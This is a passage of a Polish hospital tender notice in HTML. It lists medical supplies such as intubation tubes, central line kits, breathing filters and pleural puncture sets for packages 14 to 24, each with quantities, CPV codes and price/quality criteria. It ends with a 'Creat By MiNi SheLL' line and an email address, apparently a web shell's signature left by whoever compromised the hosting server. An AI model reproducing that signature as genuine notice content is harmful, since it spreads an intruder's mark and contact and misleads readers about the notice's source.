10	Rurka intubacyjna z mankietem niskociśnieniowym zbrojona o potwierdzonej klinicznie obniżonej przenikalności dla gazów anestetycznych lub z systemem automatycznie regulującym ciśnienie wewnątrz mankietu typu Lanz, opakowanie folia-papier o profilu ułatwiającym zachowanie kształtu rurki, różne rozmiary			Szt				100	
11	Rurka ustno-gardłowa Guedel ,różne rozmiary			Szt				2000	
12	Rurka intubacyjna 2-5-przeznaczona dla noworodka i małych dzieci ,z podziałką, jałowa z datą ważności na każdym opakowaniu ,możliwość uwidocznienia w RTG			Szt				50	
13.	 Jednorazowa maska krtaniowa z mankietem o obniżonej przenikalności dla podtlenku azotu , z przewodem łączącym balonik kontrolny wtopiony korpus rurki , posiadająca balonik kontrolny wyraźnie wskazujący na stan wypełnienia mankietu , z informacją o maksymalnej objętości wypełniania mankietu , rozmiarem maski , sterylna, różne rozmiary			Szt				300	
14.	 Prowadnice do rurek  intubacyjnych , jednorazowe , pakowane pojedynczo , jałowe , różne rozmiary. 			Szt				500	
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.78.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1.	 Elektroda do czasowej stymulacji serca .			Szt				30	
2.	Zestaw z zastawką do wprowadzania i wymiany kateterów oraz elektrod endokawitarnych różne rozmiary			szt				30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1.	 Zestaw do wkłuć centralnych jednoświatłowy 7 F/15-20 cm.  			Szt				100	
2	Zestaw do wkłuć centralnych dwuświatłowe  7F/15-20 cm 			Szt				300	
3	Zestaw do wkłuć centralnych trzyświatłowy 7 F/15-20 cm. 			Szt				300	
4	Zestaw do wkłuć centralnych pediatryczny dwuświatłowy  5-5 -, 5F/13cm. 			Szt				10	
5	Filtr do płynów infuzyjnych zatrzymujący bakterie , cząsteczki i endotoksyny z odpowietrzeniem dla dorosłych, objętość wypełnienia 2ml			Szt				200 	
6	Filtr do żywienia z odpowietrzeniem dla dorosłych, objętość wypełnienia 2,4ml, kodowany kolorem			Szt				50	
7	 Kompletny zestaw do przetoczeń z precyzyjnym regulatorem przepływu o zakresie minimum 2-350ml/min posiadający zastawkę bezzwrotną.			Szt				200	
8	Kompletny zestaw do przetoczeń z precyzyjnym regulatorem przepływu o zakresie minimum 2-350ml/min			Szt				200	
9	Igły do znieczuleń podpajęczynówkowych z końcówką Pencil Point i z igłą prowadzącą 90mm			Szt				1000	
10	Igły do portów do krótkotrwałych podaży i przepłukiwania zagięte pod kątem 90st. Różne rozmiary			szt				50	
11	Igły do portów do długoterminowych wlewów z miękką poduszką i przeźroczystym korpusem umożliwiającym kontrolę miejsca wkłucia. Różne rozmiary			szt				20	
12	Igły do punkcji lędżwiowej z igłą prowadzącą typu standard.			Szt				200	
13	Igły do punkcji lędżwiowej typu standard. 			Szt				300	
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1	 Filtr jałowy elektrostatyczny oddechowy bez wymiennika ciepła i wilgoci do zastosowania na bloku operacyjnym 			Szt				2000	
2	Filtr oddechowy elektrostatyczny , sterylny , p/bakteryjny, p/wirusowy, z wymiennikiem ciepła i wilgoci , o skuteczności filtracji min.99,99% , przestrzeni martwej max. 60ml. Skuteczności nawilżania min. 30mg. H20/l, wyposażony w port do kapnografii z kapturkiem zintegrowanym z podstawką.			Szt				2000	
3	Filtr oddechowy mechaniczny do zastosowania na oddziale intensywnej terapii z celuzowym wymiennikiem ciepła i wilgoci:			Szt				50	
4	Wymiennik ciepła i wilgoci ,,sztuczny nos z  portem do podawania tlenu 			Szt				300.	
5	 Zamknięty system do nawilżania tlenu Respiflo w zestawie z adapterem do reduktora tlenowego. Zawierający wodę sterylną z możliwością stosowania do 30 dni . Pojemność do 500 ml. 			Szt				500	
6	Jednorazowy mikrobiologicznie czysty lub sterylny układ oddechowy wykonany z rur  karbowanych 22mm,w skład którego wchodzą :2 rury o maksymalnej dł. 2 m , z łącznikiem 22F od strony aparatu ; 1 dodatkowa gałąź o maksymalnej dł. 1,5m z zakończeniami 22F po obu stronach ; 1 łącznik Y 1 odłączalny  łącznik kolankowy z portem Luer zabezpieczonym  zintegrowanym z podstawą kapturkiem , 1 łącznik 22M/22M 1 bezlateksowy worek oddechowy o poj. 3l. 1 filtr p/bakteryjny 			Szt				500	
7	Jednorazowy mikrobiologicznie czysty lub sterylny układ oddechowy wykonany z rur karbowanych 22mm. połączenie łącznikiem Y o maksymalnej dł. 1,5m. 			Szt				200	
8	Łącznik karbowany typu martwa przestrzeń  22F , kąt 90 stopni, dł.15cm. z portem do odsysania sterylny jednorazowy			Szt				400	
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.78.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1	Wkład workowy  jednorazowego użytku, z zapyloną substancją żelującą Pojemność 1000ml.Pojemność 2000 ml.Kompatybilne z karnistrami			Szt				200200	
2	Karnister  wielarozowego użytku pojemności:1000 ml,2000 ml; kompatybilne z wkladami.			Szt				1010	
3 	Torba na wymiociny z przezroczystą skalą 			Szt				500	
4	 Łączniki do drenów , cewników, ssaków-różne rozmiary, proste, stożkowe			Szt				500	
5	Węże do ssaków dł.1,5-3m. Z łącznikami dopasowanymi do cewników, do odsysania górnych dróg oddechowych			Szt.				500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1	Szczotka jednorazowego użytku do mycia rąk, wykonana z polietylenu  i gąbki, o zróżnicowanej długości włosia - krótsze po środku i dłuższe na zewnątrz, sucha, pakowana po 30 sztuk w opakowaniu zbiorczym mogącym służyć jako dozownik			Szt.				300	
2	Ostrza jednorazowe o szerokości cięcia 32 mm, wysokość strzyżenia 0,23 mm, biologicznie czyste, pakowane pojedynczo, pasujące do strzygarki  Cardinal Health			szt				500	
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 Maski usta-nos j.u. Nr.0,1,2,3,4,5 z mankietem silikonowym, mikorobiologicznie  czyste, pakowane w folię, jednorazowego użytku ( podłużne)			szt				300	
2.	Worek samorozprężalny (Ambu) do RKO-dla noworodków, dzieci i dorosłych, przeźroczysty z zastawką PIP z rezerwuarem i tlenowym, do dezynfekcji w płynach i sterylizacji parowej.			szt				10	
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.77.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Strzykawki jednorazowego użytku tuberkulinowe 1ml. 			Szt				1000	
2	Strzykawka do gazometrii-pojemność 1-2ml, zawierająca heparynę Li			szt				1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jednorazowa butelka z gwintem, gotowa do użytku, pakowana pojedynczo o pojemności 100-250ml .Posiadająca atestPZH oraz opinię dopuszczenia do karmienia dzieci i niemowląt			Szt				1000	
2.	Jednorazowy smoczek uspokajający, lateksowy, pakowany pojedynczo, gotowy do użytku, w rozmiarach 0-6 miesięcy i powyżej 6 miesiąca. 			Szt				300	
3	Butelka szklana do karmienia			Szt				400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.68.10.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szczoteczka  do mycia zębów z odsysaniem 			szt				200	
2	Zestaw  toalety jamy ustnej zawierający: szczoteczki do zębów z odsysaniem, gąbka z odsysaniem i  zagiętą końcówkę.							30	
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	 Uzupełniający zestaw do przezskórnej tracheotomii metodą  Griggsa oparty na użyciu peana, z rurką tracheostomijną z wbudowanym przewodem do odsysania z przestrzeni podgłośniowej z mankietem niskociśnieniowym gładko przytwierdzonym do rurki, oznaczenia wymagane na balonie kontrolnym ,posiadająca sztywny samoblokujący się mandryn z otworem na prowadnicę Seldingera ,bez peana. Pakowany na jednej sztywnej tacy, rozmiar 7-9			szt				40	
2.	 Zestaw do konikotomii metodą  Seldingera , zawierający zabezpieczony skalpel, cewnik do odsysania 10F, igłę Tuohy 16G/2cm, strzykawka 10ml., elastyczna prowadnica o dł. 50cm.,rozszerzadło 7cm., prowadnik, kaniula o średnicy wewnętrznej 4mm., łącznik 15mm., tasiemki do mocowania kaniuli do szyi			szt				10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do punkcji jamy opłucnej z igłą 15Gx min.100mm, typu bezpiecznego/Veressa/z zastawką  typu Y , drenami łączącymi i strzykawką 50-60ml,workiem zbiorczym2000ml-pakowany w wewnętrzny worek foliowy i zewnętrzne opakowanie folia/papier			Szt				50	
2	Zestaw do punkcji jamy opłucnej z trzema igłami 14,16,19Gx80mm, z zastawką typu Y, drenami łączącymi i strzykawką 50-60ml,workiem zbiorczym2000ml-pakowany w wewnętrzny worek foliowy i zewnętrzne opakowanie folia/papier			Szt				50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com